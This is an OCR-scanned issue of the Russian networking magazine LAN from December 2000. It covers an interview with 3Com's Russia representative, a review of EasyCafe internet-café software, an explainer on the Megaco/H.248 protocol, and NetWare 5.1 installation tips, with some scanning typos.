продаже только через каналы, мы — ка-
нальная компания. У нас двухуровневая
партнерская сеть, куда входят шесть ди-
стрибьюторов и несколько прямых ре-
селлеров, через которых мы поддержива-
ем непосредственные отношения с заказ-
чиками. Часть их продукции закупается
на склад, часть — как вы говорите, под
проекты. Говорить сейчас о делении —
20% сюда, 8о% туда — невозможно, пото-
му что оборудование со склада часто так-
же используется в проектах. Если ресел-
лер закупает у нашего дистрибьютора,
скажем OCS, четыре коммутатора и де-
сять концентраторов, то он их все равно
устанавливает в какую-то систему, явля-
ющуюся частью проекта.
Вы, наверно, хотели спросить, сколько
нашего оборудования идет в конкретные
объявленные тендеры с известтшми ко-
нечными пользователями? Так вот, сто
процентов. Мы знаем всех наших конеч-
ных пользователей — или почти всех. Как
строится наша модель продаж? Данные о
продажах фиксируются нашими реселле-
рами; эта информация, в особенности в
связи с экспортным контролем, проверя-
ется. Мы требуем от наших партнеров
предоставления сведений о том, куда по-
ставляется паше оборудование - не обо
всем, конечно, не о каждой сетевой плате.
LAN: Как у Сот поддерживает своих
партнеров в тендерах?
Фридлянд: 3С0П1 сама в тендерах не участ-
вует, это прерогатива наших партнеров.
Но мы, безусловно, их поддерживаем. Я
лично принимаю участие в переговорах
на самых разных уровнях - начиная от
правительственного уровня в так называ-
емых больших проектах информацион-
ных систем и кончая помощью конкрет-
ному реселлеру в маленьком городке на
построение сети из 20 компьютеров. Вот
конкретный пример. Буквально сегодня
мне пришлось звонить, принимать реше-
ние и давать скидку по такому проекту.
Для этого, собственно, представительство
3С0111 и существует. С одной стороны, мы
осуществляем функции контроля, а с
другой — поддержку, а также продвиже-
ние и популяризацию марки 3С01П.
LAN: Какова структура продаж у Сот в
России?
Фридлянд: Мы стараемся поддерживать
более-менее равномерную структуру
продаж по всем видам продуктов. Конеч-
но, наибольшей популярностью пользу-
ются концентраторы и коммутаторы,
особенно новое поколение, которое мы
недавно анонсировали, а также адаптеры.
LAN: Каково соотношение продаж между
Москвой и регионами ?
Фридлянд: Если подходить формально
по логистическому принципу, то по-
скольку основными дистрибьюторами у
нас являются московские и петербург-
ские компании, то тогда баланс получа-
ется в пользу центра. Однако если брать
по инсталляционному принципу, то по
грубой оценке около 75—80% нового
оборудования устанавливается в регио-
нах, особенно на Урале и в Сибири.
LAN: Какова структура партнерской се-
ти %Сот в России?
Фридлянд: У нас, как я уже упоминал,
6 дистрибьюторов, 13 золотых партне-
ров, 32 серебряных, 190 бронзовых и
достаточно большое количество про-
стых реселлеров.
LAN: А есть ли какая-нибудь специализа-
ция среди партнеров?
Фридлянд: Такая специализация есть.
Как правило, мы стараемся, конечно,
сертифицировать партнера по полному
спектру оборудования, ио некоторые,
например, занимаются продвижением
только кабельных модемов или же толь-
ко телекоммуникационным бизнесом.
Кроме того, у нас есть вертикально-ори-
ентированные партнеры.
LAN: Какие сервисные программы пред-
лагает у Сот?
Фридлянд: Прежде всего, это система
программ по замене оборудования для
локальных сетей — Advanced Hardware
Replacement. Но для России она акту-
альна разве только в случае очень круп-
ных систем — российские конечные
пользователи еще не привыкли к сер-
висным контрактам.
У нас есть, конечно, сервис-цен тры, а
кроме того, мы предлагаем стандартные
программы замены оборудования. Мы не
навязываем каких-либо сервисных конт-
рактов, но поощряем их заключение.
LAN: Переходя к другим направлениям
деятельности уСот, каковы, по-вашему,
перспективы развития 1Р-телефонии?
Фридлянд: IP-телефония родилась не се-
годня, это не веяние моды. Первые идеи
1Р-телефонии — конечно, не в том пони-
мании, в каком они используются сей-
час, - появились около 30 лет назад, и
попытки совмещения голоса и данных в
теоретическом плане ничего нового не
несут. Сегодня технология развилась до
такой степени и производительность
коммутации такова, что память можно
организовать так, что она позволяет эф-
фективно разделять сигналы и переда-
вать пакеты. Это одна из предпосылок
востребованности данной технологии.
Другая заключается в том, что сейчас в
мире проложено очень много меди. И в
14 LAN/Журнал сетевых решений
> ИНТЕРВЬЮ
результате связисты начинают присматриваться к компьютер-
ным технологиям, а компьютерщики, наоборот, — к телеком-
муникационным технологиям, потому что у них появилось об-
щее поле, в частности Internet. И отсюда возникает потреб-
ность в общей сети, т. е. в IP-телёфонии. Никаких других при-
чин для этого нет.
Если стоимость IP-телефона будет соразмерим» с ценой
обычного телефона, — хотя бы около юо долларов, а не 300, как
сейчас, а к этому все идет, то этот продукт будет востребован
всеми и вся, потому что очень удобно, когда от рабочего стола
идет не шесть проводов, а один. Однако, прежде всего, — это сэ-
кономленные деньги. Прокладка проводов и их дальнейшее об-
служивание стоят денег, а когда все в одном, то это совершенно
другой уровень интеллектуализации, и в конечном итоге — это
передача информации. Что такое передача информации? Это
импульсы, несущие информацию. Природа у них одна и та же.
jCom рассматривает данное направление как одно из наи-
более перспективных. Что касается продаж NBX в России, то
они весьма значительны. Если говорить о конкретных проек-
тах, то, к сожалению, я пока не могу раскрывать подробности.
В основном нашими заказчиками являются государственные
предприятия, а также банки.
LAN: А каковы перспективы в России другого приоритетного
для %Сот направления — широкополосного доступа с использо-
ванием технологий DSL?
Фридлянд: Технология DSL для России пока не очень акту-
альна. Это связано, прежде всего, с ее дороговизной. Решение
проблемы «последней мили» - звучит красиво, но данная тех-
нология пока не вышла на уровень функциональной потреб-
ности. Дорого и само оборудование, и его последующее обслу-
живание. Для реализации DSL вам придется поставить стан-
цию для реализации коммутации синхронных и асинхронных
потоков, а это уже даже не тысячи долларов.
LAN: Еще одним развиваемым ^Сот направлением являются
беспроводные сети...
Фридлянд: Сегодня беспроводные технологии находятся на том
уровне, на котором Ethernet находился около ю лет назад. Их
применение ограничивается рамками одного помещения с так
называемой точкой входа, причем желательно, чтобы не было
электромагнитных помех, бетонных стен и т. д. Сейчас jCom,
Cisco и другие работают над стандартом для организации бес-
проводной сети в рамках одного здания, т. е. в настоящее время
развитие этих технологий находится на начальной стадии.
Пока продажи беспроводного оборудования в России - до-
статочно редкий случай. С какой целью может создаваться бес-
проводная сеть? Например, из опасения необходимости в буду-
щем переезда в другое здание. Но если посчитать все затраты,
то такая сеть обойдется в три-четыре раза дороже, чем обычная.
Вместе с тем, беспроводные сети на персональном уровне —
совсем другое дело. Допустим, у вас дома есть умные интеллек-
туальные аппараты, тогда беспроводная технология, с помощью
которой пользователь не сходя с места мог бы управлять газо-
вой плитой, доступом в Internet и т. п., была бы весьма жела-
тельна. Такая технология у нас есть, 3С0111 уже выпустила но-
вый продукт, который позволяет воспользоваться вышеупомя-
нутыми преимуществами. Этот продукт называется Audrey. IAN
pentium*///
Время
! работать с нами!
с
| Компьютер
; ТСМ Олимп 8000
з
х на базе процессора Intel® Pentium* III
S с тактовой частотой 800МГц
о
ф
z Высокопроизводительная станция
w для эффективной работы
° с современными приложениями
х
о
| Комплексное обслуживание:
' - Комплексные поставки оборудования и расходных
•| материалов для предприятий;
2 - Доставка по регионам;
* - Индивидуальный подход в решении задач
5 Сетевые решения:
х - Структурированные Кабельные Системы;
2 - Активное сетевое оборудование;
2- - Серверы и рабочие станции;
= - Проектирование и монтаж;
ПТ1МАРКЕТ
компьютере
Корпоративный отдел:
(095) 723-81-26 e-mail: corp@techmarket.ru
Дилерский отдел:
(095) 214-20-17 e-mail: opt@techmarket.ru
> http://www.lanmag.ru
Декабрь 2000 15
> СЕТЬ ДЛЯ ВСЕХ
Средство
Заходите к нам на огонек...
Александр Авдуевский
Internet-кафе, символ победы всеоб-
щей интернетизации на Западе, по-
степенно становятся обычным явле-
нием в нашей стране. Например, мне
уже не раз приходила электронная поч-
та от коллег, находящихся на отдыхе
или в командировках, которую они от-
правили именно из Internet-кафе (есте-
ственно, через службы наподобии
mail.ru). Из сказанного можно сделать
вывод, что такая услуга вполне прижи-
лась в туристско-гостиничном бизнесе.
Сама организация Internet-кафе, од-
нако, не такое прос тое дело, как может
показаться на первый взгляд. Конечно,
поставить компьютеры, объединить
их в сеть и подключить к Internet дос-
таточно просто. Но необходимо еще
решить вопросы ограничения доступа
к ресурсам компьютеров и сети, а так-
же биллинга (особенно если речь идет
о гостинице или бизнес-центре). Для
этого требуются соответствующие
программные средства.
ПРОСТОТА —ЗАЛОГ УСПЕХА
Наше внимание привлекла разработка
турецкой (!) компании TinaSoft
(http://Www.tinasoft.com) Easy Cafe.
Это программное обеспечение состоит
из клиентской и серверной частей.
Клиентская часть выполняет иесколь-
ко задач. Во-первых, загружаясь авто-
матически (инструкции по автозагруз-
ке записываются в реестр), она высту-
пает в роли единственного средства до-
ступа к компьютеру. Переключиться из
ее стартового экрана в другое приложе-
ние нельзя (и выгрузить его посредст-
вом Ctrl-Alt-Del) — пользователю надо
будет ввести пароль, иначе работа ока-
жется невозможна. (Это создает опре-
деленные неудобства, так как деинстал-
лировать программу при необходимо-
сти можно, только прибегая к некото-
рым ухищрениям.) Во-вторых, зайдя
под паролем администратора, с консоли
клиен тской час ти можно задать ограни-
чения на доступ к ресурсам компыоте-
ра, включая, в частности, сетевые и ло-
кальные диски, панель управления и
приложения MS-DOS. Таким образом,
программа защищает компьютер от не в
меру пытливых (или, наоборот, недос-
таточно опытных) посетителей, точнее,
от их действий, способных повлечь за
собой необходимость переустановки
всей системы. В-третьих, с помощью
клиентской части EasyCafe можно сде-
лать в кафе заказ — консоль этого при-
ложения позволяет ставить галочки в
меню и отправлять заказ кассиру.
Серверная часть выполняет несколь-
ко важных функций. Во-первых, если
Все по полочкам Серверная часть EasyCafe — весьма
многофункциональное средство.
клиентская часть не получает отклика
от серверной, то работа с компьютером
невозможна. Эго связано, в частности, с
тем, что авторизация пользователей
осуществляется именно сервером, там
же создаются учетные записи пользова-
телей. Поля учетной записи позволяют
вводить самую разнообразную инфор-
мацию о пользователях, что дает воз-
можность определить категорию посто-
янных клиентов, а также делает удоб-
ным применение приложения в услови-
ях гостиницы. В учетной записи хра-
нится кредитная информация о клиен-
те — расценки, по которым он получает
Internet, отпущенное ему время (если
Internet предоставляется по предопла-
те, причем клиентская консоль также
отображает оставшееся время). Таким
образом, налицо достаточно развитые
средства биллинга, позволяющие, на-
пример, сделать так, чтобы постоянные
клиенты могли позже «досмотреть^
свое время, а «случайные» — получить
сдачу за «недосмотренное».
Серверная часть также принимает
от клиентской заказы в «буфет», ее же
можно использовать, если заказ дол-
жен быть принят в устной форме. Кас-
сир (так условно называется пользо-
ватель серверной части в самом при-
ложении) имеет возможность распе-
чатать счета. Программой предусмот-
рена и пересменка кассиров с фикси-
рованием того, кто какие заказы при-
нимал. Одним словом, приложение в
какой-то степени является еще и
АРМ кассира в кафе.
Наконец, серверная часть EasyCafe
представляет собой средство контроля
за порядком. Программа отслеживает
набор клиентом «неподходящих»
ключевых слов (в файле фильтра по
умолчанию содержится некий стан-
дартный набор из области «только для
взрослых»), а также позволяет удален-
но отключать клиентский компьютер,
если кассир углядел в действиях посе-
тителя что-то недозволенное или не-
желателыюе.
ЗАКЛЮЧЕНИЕ
Единственный, на мой взгляд, сущест-
венный недостаток EasyCafe состоит в
отсутствии поддержки русского языка.
По с технической точки зрения — это
вполне законченный и весьма работо-
способный продукт. За исключением
локализации, общий подход, как мне
кажется, вполне адекватен нашим усло-
виям. Все-таки разработчики — гурки, а
они тоже не совсем европейцы... LAN
Александр Авдуевский - обозреватель
LAN. С ним можно связаться по адресу:
shura@lanmag.ru.
16 LAN/Журнал сетевых решений
Централизация
обработки сигнальной
информации снижает
требования
к интеллектуальности
терминалов.
Дуг Аллен
Хотя IP-телефония может стать хо-
рошим трамплином для предло-
жения новых, расширенных услуг
передачи голоса и данных операторами
связи, ее развертывание сдерживается
отсутствием (либо чрезмерным коли-
чеством!) стандартов пе-
редачи голоса по IP
(Voice over IP, VoIP).
Разработка новейшего
протокола управления
вызовами Megaco (являю-
щегося развитием прото-
кола Media Gateway
Control Protocol, MGCP)
усугубляет эту проблему,
несмотря на то что его со-
здатели стремились к сокращению ко-
личества используемых протоколов.
Megaco определяет взаимодействие,
с одной стороны, шлюза между разны-
ми средами передачи данных (Media
Gateway, MG), который преобразует го-
лосовой сигнал сети с коммутацией ка-
налов в пакетный трафик, и, с другой, -
контроллера шлюзов между средами
передачи данных (Media Gateway
Megaco связывает шлюз между
средами передачи данных (Media Gateway, MG) с
контроллером шлюзов (Media Gateway Controller,
MGC) при внутридоменном управлении устройст-
вами, участвующими в установлении соединения
или проведении сеанса связи.
Controller, MGC), иногда называемого
агентом вызовов или программным
коммутатором, который определяет ло-
гику обработки этого трафика (см. Ри-
сунок 1). Иными словами, Megaco раз-
работан для внутридоменного удален-
ного управления устройст-
вами, отвечающими за ус-
тановление соединения
или проведение сеанса свя-
зи, такими, как шлюзы
VoIP, серверы удаленного
доступа, мультиплексоры
цифровых абонентских
линий (Digital Subscriber
Line Access Multiplexer,
DSLAM), маршрутизато-
ры с поддержкой многопротокольной
коммутации с использованием меток
(Multiprotocol Label Switching,
MPLS), оптические кросс-коннекторы,
модули агрегирования сеансов РРР и
другие.
Для операторов связи и произво-
дителей оборудования решение о
внедрении Megaco равнозначно отве-
ту на вопрос: «Сколько протоколов
сигнализации — протоколов уста-
новления соединений между конеч-
ными точками, такими, как телефо-
ны, магистральные порты офисных
АТС и станции видеоконференций —
должен поддерживать шлюз?» Раз-
брос мнений по этому вопросу колеб-
лется от: «Все действия производят-
ся в конечных точках, следовательно,
их нужно делать интеллектуальны-
ми» — до: «Взаимодействие — это
главное, поэтому необходима центра-
лизация».
По мнению тех, кто считает, что
оконечные устройства должны быть
интеллектуальными, сигнализация
должна завершаться на самом шлюзе
между средами. Примером может
служить телефон с поддержкой про-
токола инициирования сеансов
(Session Initiation Protocol, SIP),
поскольку сигналы управления вызо-
вами формируются и обрабатывают-
ся непосредственно самим телефон-
ным аппаратом.
Тем же, кто верит, что обработку
сигнализации лучше поручить обыч-
ным компьютерам, оставляя специа-
лизированному устройству задачу сог-
ласования сред передачи по внешним
и внутренним сторонам сети, необхо-
дим протокол, который бы определял
взаимодействие между частью систе-
мы, согласующей среду, т. е. шлюзом,
и частью системы, обрабатывающей
сигнализацию, т. е. контроллером
шлюза.
Именно для этого и были разрабо-
таны протоколы MGCP и Megaco -
протокол-новичок, известный также
как стандарт ITU Н.248. Эти сравни-
тельно низкоуровневые протоколы
управления устройствами сообщают
шлюзу, каким образом связать пото-
ки, поступающие в сеть с коммутаци-
ей пакетов или ячеек, с потоками па-
кетов или ячеек, переносимыми, на-
пример, транспортным протоколом
реального времени (Real-Time
Transport Protocol, RTP). По сущест-
ву, Megaco повторяет MGCP в отно-
шении архитектуры и взаимодейст-
вия контроллера со шлюзом, но при
этом Megaco поддерживает более ши-
рокий диапазон сетевых технологий, в
том числе ATM.
Типичным примером работы про-
токола MGCP является проверка со-
стояния конечной точки на предмет
снятия трубки (которую поднимает
абонент, чтобы сделать звонок). После
© Miller Freeman Inc.
18 LAN/Журнал сетевых решений
Модель вызова
Контекст Окончание транспортного канала
телефонной сети общего пользования
Окончание .
потока RTP х .______ -
Окончание транспортного канала
телефонной соти общего пользования
Контекст
Окончание
потока RTP
Контекст
Окончание л. Окончание транспортного канала
потока RTP телефонной сети общего пользования
Символ ’ означает способность контекста смешивать потоки (все окончания «слышат» друг друга).
Источник: Marconi
Пример взаимосвязи окончаний и контекстов в решении на основе протокола Медасо.
фиксации события «снятие трубки»
шлюз сообщает об этом контроллеру,
после чего последний может послать
шлюзу команду подать в линию непре-
рывный гудок и ждать тональных сиг-
налов DTMF набираемого номера або-
нента. После получения номера конт-
роллер решает, по какому маршруту
следует направить вызов, и, используя
протокол сигнализации между
контроллерами, такой, как Н.323, S1P
или Q.BICC, взаимодействует с око-
нечным контроллером. Оконечный
контроллер дает соответствующему
шлюзу указание подать звонок на вы-
зываемую линию. Когда этот шлюз оп-
ределяет, что вызываемый абонент
снял трубку, оба контроллера дают со-
ответствующим шлюзам команды на
установление двусторонней голосовой
связи по сети передачи данных. Таким
способом данные протоколы распоз-
нают состояния конечных точек, уве-
домляют об этих состояниях контрол-
лер, генерируют в линии сигналы (на-
пример, непрерывный гудок), а также
формируют потоки данных между
подключенными к шлюзу конечными
точками и сетью передачи данных, на-
пример потоки RTP.
Сегодня многие производители
считают более целесообразным по-
строение крупных шлюзов, где сигна-
лизация отделена от обработки пото-
ков данных из-за повышенной плот-
ности межсоединений (которые могут
Нулевой контекст
Окончание транспортного канала
телефонной сети общего пользования
быть соединениями ОС-3 или даже
ОС-12). Передача функций сигнализа-
ции быстрому серверу представляется
более рациональным решением, чем
попытка встраивания их в шлюз. Кро-
ме того, снимая обязанности по фор-
мированию сигналов со шлюза в по-
мещении заказчика, сетевые операто-
ры сохраняют большую степень конт-
роля, что, по мнению многих, приве-
дет к повышению надежности сетей —
важнейшему фактору для обеспече-
ния связи в случае чрезвычайных об-
стоятельств.
Megaco оперирует двумя базовыми
конструкциями: окончаниями и кон-
текстами (см. Рисунок 2). Окончания
соответствуют потокам, входящим в
или выходящим из шлюза (например,
аналоговые телефонные линии, пото-
ки RTP или потоки MP3). Окончания
имеют свойства, к примеру макси-
мальный размер буфера компенсации
задержек, которые контроллер может
проверять и контролировать. Шлюз
присваивает окончаниям имена, или
идентификаторы (Termi nation] D).
Некоторые окончания, обычно пред-
ставляющие собой порты шлюза, та-
кие, как аналоговые линии или цифро-
вые каналы DSo, инициализируются
шлюзом при его загрузке и остаются
активными все время. Другие — фор-
мируются по мере необходимости и
освооождаются после использования.
Такие окончания называются «эфе-
мерными» и используются для пред-
ставления потоков в пакетной сети,
например потоков RTP.
Окончания могут включаться в
контексты, которые определяются,
когда два или более оконечных пото-
ка смешиваются и соединяются вме-
сте. Нормальный, «активный», кон-
текст может состоять, например, из
одного физического окончания (ска-
жем, один капал DSo в канале DS3) и
одного эфемерного окончания (по-
ток RTP, связывающий шлюз с се-
тью). Контексты создаются и освобо-
ждаются шлюзом по команде, посту-
пающей от контроллера. Сразу после
создания контексту присваивается
имя (идентификатор контекста,
Context]D), причем окончания мо-
гут как добавляться, так и удаляться
из него. Контекст создается добавле-
нием первого окончания, а освобож-
дается в результате удаления
(изъятия) последнего.
Если в случае простого вызова кон-
текст может содержать два окончания
(одно представляет оконечное уст-
ройство, например телефон, а другое
- соединение с сетью по протоколу
RTP), то в случае организации конфе-
ренции он может включать десятки
окончаний, представляющих участни-
ков конференции. В принципе кон-
текст может содержать лишь одно
окончание (например, в случае трех-
стороннего вызова). В любой момент
два окончания находятся в одном кон-
тексте (и, следовательно, связаны
друг с другом), тогда как третье окон-
чание присутствует в контексте, со-
стоящем только из него самого. Когда
пользователь указывает, что хочет пе-
реключиться с активного па ждущего
абонента (например, используя кноп-
ку Flash на телефонном аппарате), од-
но из окончаний перемещается в дру-
гой контекст.
Окончание может состоять из не-
скольких потоков, поэтому и кон-
текст может быть многопотоковым.
Потоки аудио- и видеосигналов, а
также данных (например, электрон-
ная доска сообщений общего пользо-
вания стандарта Т-120) могут сущест-
вовать в контексте среди нескольких
окончаний.
20 LAN/Журнал сетевых решений
Кроме функции осуществления
простых соединений, сводящейся к
размещению окончаний в контекстах,
шлюзы могут также генерировать то-
нальные сигналы, объявления, звонки
и другие сигналы, доходящие до слуха
пользователя. В Megaco включены
средства подачи сигналов на оконча-
ния и управления ими. С помощью
этих средств Megaco может управлять
шлюзами, которые поддерживают
функции интерактивного голосового
отклика (Interactive Voice Response,
IVR), а также обеспечивать генерацию
сигналов, сопутствующих обычному
телефонному вызову.
Шлюз может выявлять такие асин-
хронные события, как снятие теле-
фонной трубки или нажатие клавиши
тонового набора DTMF и сообщать
об этом контроллеру. Используя со-
кращенную нотацию, называемую
digitmap, шлюзы могут быть запро-
граммированы па поиск полного те-
лефонного номера или вызова вспо-
могательной функции и посылать
«строку набора номера» на контрол-
лер за одну операцию. Шлюз может
собирать статистику о количестве пе-
реданных или принятых байт, поте-
рянных пакетов и т. п., азатем переда-
вать ее контроллеру.
Управление окончаниями, контек-
стами, событиями и сигналами осуще-
ствляется в Megaco с помощью после-
довательности команд. Команда Add
добавляет окончание в контекст и в то
же время может использоваться для
создания нового контекста. Команда
Subtract удаляет окончание из контек-
ста и в результате може т вызвать осво-
бождение контекста, если в нем боль-
ше не остается окончаний. Команда
Move перемещает окончание из одно-
го контекста в другой. Modify изменяет
состояние окончания. AuditValue и
Auditcapabilities возвращают информа-
цию об окончаниях, контекстах и об
общем состоянии и возможностях
шлюза. Servicechange устанавливает
управляющую связь между шлюзом и
контроллером и также применяется в
некоторых ситуациях для аварийного
восстановления. Все эти команды по-
сылаются от контроллера к шлюзу, хо-
тя команда ServiceChange может посы-
латься и шлюзом. Команда Notify, с по-
мощью которой шлюз информирует
> http:/7www.Ianmag.ru
контроллер о том, что произошло одно
из событий, представляющих для пос-
леднего интерес, передается от шлюза
контроллеру.
Команды группируются в транзак-
ции, которые представляют собой пос-
ледовательности команд, выполняе-
мых по порядку. Транзакции выступа-
ют в качестве единицы передачи ин-
формации между шлюзом и контрол-
лером. Передача транзакций осущест-
вляется с использованием широкого
спектра транспортных протоколов,
включая UDP и TCP (поддержка дру-
гих транспортных опций пока только
планируется). Затем контроллер по-
сылает на шлюз подтверждение тран-
закции вместе с ответами на каждую
команду.
Комплект (package) — это набор
свойств, событий, сигналов и стати-
стических характеристик, которые оп-
ределяются некоторым документом и
применяются к набору окончаний в
шлюзе. Megaco определяет базовый
набор комплектов для наиболее общих
объектов и операций, таких, как ана-
логовые и цифровые линии, распозна-
вание и формирование DTMF, а также
для RTP. Как IETF, так и ITU работа-
ют над дополнительными определени-
ями комплектов.
Определяя комплект, мы задаем все
специфические характеристики окон-
чаний, к которым он может быть при-
меним, и управление всеми реализую-
щими этот комплект шлюзами может
осуществляться контроллером, если
он также «понимает» этот комплект.
Например, комплект аналоговой
линии включает события для состоя-
ния трубки (лежит/снята), сигналов
звонка и статистики принятых и пере-
данных байт. К одному окончанию мо-
жет применяться более одного комп-
лекта. Комплекты могут определяться
любыми организациями, даже произ-
водитель может определить свой соб-
ственный комплект.
В конце августа 2000 г. в лаборатории
функциональной совместимости уни-
верситета Нью-Гемпшира проводи-
лось тестирование более десяти неза-
висимых разработок, использующих
протокол Megaco. Это говорит о том,
что процесс его внедрения сдвинулся с
Ресурсы Internet
При написании данной статьи использова-
лись заметки Брайана Розена, главного тех-
нического специалиста компании Marconi
(http://www.marconi.com), собравшего льви-
ную долю представленного материала.
0 протоколе Megaco можно узнать больше на
домашней странице IETF (http://www.ietf.org/
htmt.charters/megaco-charter.html). Текущий
вариант спецификаций протокола находится
по адресу: ftp://standards.nortelnetworks.om/
megaco/docs/latest/megah248_ protocol.pdt.
мертвой точки. Некоторые операторы
начали обращаться к своим поставщи-
кам с просьбой о поддержке Megaco.
Конечно, на рынке уже есть немало
шлюзов. В этих устройствах поддер-
живаются более старые, устоявшиеся
протоколы, из которых наиболее из-
вестными являются IPDC и MGCP.
Многих волнует, сможет ли Megaco
потеснить протокол MGCP, или же
крепко стоящий па ногах MGCP вос-
препятствует принятию Megaco в ка-
честве международного стандарта для
приложений с различными средами
передачи данных.
«Я не могу уверенно предсказы-
вать, укоренится ли Megaco за счет
MGCP или IPDC, или же случится
обратное, — замечает Айк Эллиот,
вице-президент по программной
коммутации компании Level 3
Communications. — Честно говоря,
эти протоколы очень похожи друг на
друга, и для многих приложений не
имеет значения, какой из них будет
использоваться. Однако Megaco луч-
ше интегрирован с приложениями с
поддержкой нескольких сред переда-
чи, чем MGCP, потому что в базовый
протокол включены семантические
элементы для конференций. Благо-
даря этому MGCP может быть луч-
шей основой для приложений, не
привязанных к какой-либо среде, на-
пример для управления сеансами па
базе MPLS».
Дуг Аллен — старший редактор Network
Magazine. С ним можно связаться по
адресу: dougallen@cmp.com.
Декабрь 2000 21
>ТЫСЯЧА МЕЛОЧЕЙ
Маленькие «хитрости» инсталляции сервера NetWare 5.1
; Дмитрий Русаков
Вы решили установить ОС NetWare
5.1. и хотите, чтобы она работала
совместно с другими серверами слав-
ного племени NetWare. Данная сетевая
ОС поставляется с двумя версиями
NetWare Directory Services (NDS7 и
NDS8). Однако восьмая версия пред-
почтительнее, тем более что Novell ре-
комендует именно ее. Чтобы установка
прошла просто и гладко, необходимо
выполнить ряд простых требований.
Если в вашем дереве все еще оста-
ются серверы NetWare
4.10, очень желательно их
модернизировать до 4.11.
Затем вам нужно прове-
рить синхронизацию реп-
лик разделов на серверах,
в том числе их времен-
ную синхронизацию. Что
касается времени, то
здесь все просто. На лю-
бом сервере в дереве дос-
таточно из утилиты dsre-
pair.nlm выбрать пункт
Time sinchronization и убедиться, что
время синхронизировано. Синхрони-
зацию реплик (копий) всех разделов
можно проверить, выбирая Report
sinchronization status.
Потом из главного меню выбираем
Advanced options menu и Check external
references и проверяем, что нет ника-
ких сообщений об объектах NDS, по-
меченных как Obituaries, т. е. «удален-
ные», «перемещенные» или «пере-
именованные», как на Рисунке 1. Та-
кие сообщения могут появляться
лишь на короткое время, в ходе вы-
полнения операций над объектом. В
противном случае это свидетельству-
ет о крупных неполадках в сиихрони-
УВАЖАЕМЫЕ ЧИТАТЕЛИ!
Вы можете поделиться своим опытом решения
проблем, возникающих при работе в сети (воз-
можно. очень полезным многим читателям в
их повседневной работе). Наиболее интересные
материалы будут опубликованы в ближайших
номерах журнала LAN.
Присылайте ваши отклики
по электронной почте:
lan@lanmag.ru,
или по факсу: (095) 253-9204.
зации реплик разделов вашей NDS.
Для текущей проверки на консоли
всех серверов дерева необходимо пе-
рейти к экрану Directory Services и убе-
диться, что все процессы заканчива-
ются успешно, как на Рисунке 2. Дан-
ную операцию нужно проделать на
всех серверах дерева.
Активизировать подобный экран
можно с помощью следующих команд:
set dstrace=OFF (выключение экрана
отображения транзакций NDS)
set dstrace=NODEBUG (вы-
ключение всех отладоч-
ных сообщений)
set dstrace=ON (включе-
ние экрана отображения
транзакций NDS)
set dstrace=+S (разреше-
ние на просмотр синхро-
низации)
set dstrace=*H (инициали-
зация синхронизации ме-
жду серверами)
set dstrace=+J (разреше-
ние сообщений процесса Janitor
(уборщик))
set dstrace=*F (инициализация про-
цессов очистки)
set dstrace=*U (инициализация
проверки состояния серверов
Up/Down)
Данный экран полезно оставить ак-
тивным и изредка поглядывать на него
(Novell рекомендует раз в неделю),
чтобы иметь возможность как можно
раньше обнаружить возникающие про-
блемы. Но при этом надо помнить, что
он забирает часть ресурсов сервера.
Итак, все в порядке? Если — да, то
идем дальше, если нет — то устраняем
проблему!
Вы думаете, что пришла пора инстал-
лировать новую операционную систе-
му? Не торопитесь. Вам придется подо-
ждать еще немного и заняться капиталь-
ным обновлением схемы NDS. Для это-
го на компакт-диске с NetWare 5.1 име-
ется утилита Deployment Manager
(nwdeploy.exe).
Следуя ее подсказкам, шаг за ша-
гом, вы должны проверить версию и
модернизировать существующую
NDS (View and update NDS versions). В
любом случае ее следует обновить до
последней версии, сейчас это б.ю. Для
этого надо перекачать заплату
ds411t.exe с узла support, novell.com.
Потом вам будет предложено расши-
рить схему NDS (Prepare for NDS8),
чтобы сделать ее совместимой с вось-
мой версией. И, наконец, вам потре-
буется установить лицензионный
сервис для NetWare 4.11 (View and
update Novell Licensing Service). Он ну-
жен для обеспечения совместимости
с NetWare 5.1.
Нелишне заметить, что данная ути-
лита написана на Java, требует нали-
чия па вашем компьютере клиента
NetWare и соответствующих админи-
страторских прав, к тому же опа рабо-
тает достаточно неспешно даже на
мощной машине.
И вот настает торжественный мо-
мент: наконец-то вы можете начать
установку самой NetWare 5.1. Здесь
вас не должно подстерегать каких-
либо неожиданностей. На запросы
об установке поддержки Domain
Name System и Certificate Server вы
смело можете ответить отказом и
установить их позднее, когда они
вам понадобятся. Из сетевых прото-
колов нужно, конечно, установить
IPX/SPX для взаимодействия с дру-
гими серверами NetWare 4.11 и, жела-
тельно, TCP/IP — с целью поддерж-
ки удаленного управления сервером
через Management Portal (это очень
удобно) и установки сервера ftp (ес-
ли он вам нужен).
Программа инсталляции не под-
держивает режима летнего времени
на территории России. Поэтому, ус-
танавливая ее летом, я бы рекомен-
довал выбрать следующий часовой
пояс, а затем задать верные парамет-
ры, используя модуль monitor.nlm и
указав Server parametrs/Time. Напом-
ню, что servman.nlm более не поддер-
живается.
Инсталляция нового сервера в дере-
во проходит не так уж быстро. Чтобы
скоротать время, за этим процессом
можно понаблюдать, так сказать, «вжи-
вую», на экране Directory Services других
серверов.
И вот, у вас появился сервер
NetW'are 5.1! Но радоваться еще рано,
22 LAN/Журнал сетевых решений
> ТЫСЯЧА МЕЛОЧЕЙ
Рисунок 1 Экран свидетельствует, что на этом сервере нет потерянных транзакций и он хранит ре-
плики (копии) всех разделов NDS.
Т* HLUNSULE EXE ________________________________________НЕЕ
HetUcrc 4.11 Directory Ge I'viccs G.10, 5/02/2000
<2000/11/04 13:4©; П>
SYNC.; Striri. sync nF janrl. 11. hni ГП11
SYNC; Start гшкЬлнпЛ яупс with <41=3, state=0^ type=n> Г01 AOOI86l<fiANK3.RANK>
SYNC: Using version S on server <CM=BflNK3>
SENDING TO--------> CN=BANK3
SYNC: cending updates to eervor <CN=HfiHK3>
EYNC: update to server «Ж“ВЛНКЗ> 3uccc33fully conplctcd.
Merged trona it ivc vector for [0100018b ]<B0HK3.Bft№O- succeeded
SYNC: GkulkTart it ion for <IRoot]> succeeded
SYNC: End svne of partition All processed - VEG.
<2000/11/04 l Ч;4(||;37>.Тап1е<1г; Starring flat cleaner
JANITOR: purged I nnr.rlfts and I uaIiirs
Janitor! End flat cleaner
Рисунок 2 Экран Directory Services показывает, что реплики нормально синхронизируются на всех
серверах, которые имеют один и тот же раздел.
Ресурсы Internet
Более подробную информацию можно найти в следующих документах (TID)
на http://www.support.novell.com.
2909026 Команды, фильтры и процессы DSTrase
10012763 Ошибка 638: Предыдущее перемещение не закончено
10027596 Ошибка 708: Проверка внешней ссылки
10056814 Рекомендации по реализации IXJDS 8
10022791 Как избавиться от фиктивных объектов
